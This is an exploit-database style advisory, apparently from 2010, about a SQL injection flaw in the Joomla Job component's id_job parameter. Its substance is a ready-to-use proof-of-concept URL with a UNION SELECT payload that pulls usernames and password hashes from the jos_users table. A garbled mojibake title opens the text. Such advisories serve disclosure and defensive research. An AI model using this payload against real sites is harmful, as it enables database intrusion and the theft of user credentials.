JoomlaSQLע©

[JoomlaSQLע© ȫ]# Title: Joomla (Job Component) SQL Injection Vulnerability 
# EDB-ID: 11307 
# CVE-ID: () 
# OSVDB-ID: () 
# Author: B-HUNT3|2 
# Published: 2010-02-01 

 
[~]>> ...[BEGIN ADVISORY]...  

   

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  

   

[~]>> TITLE: Joomla (Job Component) SQL Injection Vulnerability  

[~]>> LANGUAGE: PHP  

[~]>> RESEARCHER: B-HUNT3|2  

[~]>> CONTACT: bhunt3r[at_no_spam]gmail[dot_no_spam]com  

   

   

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  

   

[~]>> DESCRIPTION: Input var id_job is vulnerable to SQL Code Injection  

[~]>> AFFECTED VERSIONS: N/A  

[~]>> RISK: Medium/High  

[~]>> IMPACT: Execute Arbitrary SQL queries  

   

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  

   

[~]>> PROOF OF CONCEPT:  

   

[~]>> http://server/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=[SQL]  

   

[~]>> http://server/index.php?option=com_job&controller=listcategory&task=viewJob&id_job=-1+UNION+ALL+SELECT+1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+FROM+jos_users--  

   

!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!  

   

[~]>> ...[END ADVISORY]... 
